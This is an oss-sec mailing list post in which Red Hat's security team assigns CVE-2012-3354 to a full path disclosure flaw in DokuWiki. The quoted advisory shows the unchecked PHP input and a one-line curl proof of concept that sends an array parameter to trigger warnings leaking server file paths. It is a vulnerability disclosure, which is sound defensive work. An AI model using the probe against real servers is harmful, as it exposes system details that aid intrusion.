oss-sec mailing list archives
Re: CVE request: Full path disclosure in DokuWiki
From: Kurt Seifried <kseifried () redhat com>
Date: Sun, 24 Jun 2012 23:17:49 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 06/24/2012 06:40 AM, Felipe Pena wrote:
Full path disclosure in DokuWiki ======================================== DokuWiki is a simple to use Wiki aimed at the documentation needs of a small company. It works on plain text files and thus needs no database. It has a simple but powerful syntax which makes sure the datafiles remain readable outside the Wiki. The POST input 'prefix' is not checked/casted for proper data type before passing to PHP's substr() function, which lead to displays an warning with sensitive information on server with PHP error level enabled: $PRE = cleanText(substr($_POST['prefix'], 0, -1)); $ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null | grep Warning <b>Warning</b>: substr() expects parameter 1 to be string, array given in <b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/dokuwiki/doku.php:47) in <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br /> Affected versions: ======================================== - Angua (RC1) - Rincewind - Anteater References: ======================================== http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure Credits: ======================================== This vulnerability was discovered by Felipe Pena. Twitter: @felipensp
Please use CVE-2012-3354 for this issue. - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJP5/R9AAoJEBYNRVNeJnmTuy4QAMQ1Lde156PpN81VAVaE9XUk vcZ6arWAvYIJzMMYlwVZlWdfhQbds4v0IbuefugnsS7XMD5/+Gn0Y07ulqTWiDMY dQ6ESNkVvTW959S977aSullrYlF3LDgYxb48dvclza8fxQxQZRKGZ/ppHJ2+CGqn sGwiJjF/zAQDYRiNl9+FE2aLrWjUTU1IEIwAHzPMa/jMO/XPhMVjU48JntMd1f/n rcpUbTVByY2dFaPGpH8APFCjPlCk3fkWZCzGmGRNkZQBvGrGBFOHdbeP+zSITwd5 ksQqhzOG4X43VGMpkMREgMc9+korDplKGAjBGGHZKOGQA6ad3rjspHpnmfkyn7wY Ug3aolQtwsOyzYBA/LRpYNZcRTYGRRSnoutjNkGaAZHjiLKixrlmv99CxubCefLf d0q7qF1gMaZX3bY1X9cYcatKDI/26Xlr1zsDYXyQsmqNbqqsvaZ98lq3dR3r1BbD kEIkEF2kCvB8XEtgpPni7MwyLI5vf7iFOMyVzVmgT8jvTME1dpph0aL7L0nm65Ko YkgGk8ppC3wN2v9AC6N/fAAFUzPuCUGmIDDMqXL6/T/4Kxem0a2NzlTdxpUgQqgW m7xs0HgdBjRpeTD8Oz0yWpirQDjplLpbNRC08ZekRn8Tuz4pjtveHuSJMNLeNPOs vO1optUzhVkE9I0lJAuE =gzwk -----END PGP SIGNATURE-----
Current thread:
- CVE request: Full path disclosure in DokuWiki Felipe Pena (Jun 24)
- Re: CVE request: Full path disclosure in DokuWiki Kurt Seifried (Jun 24)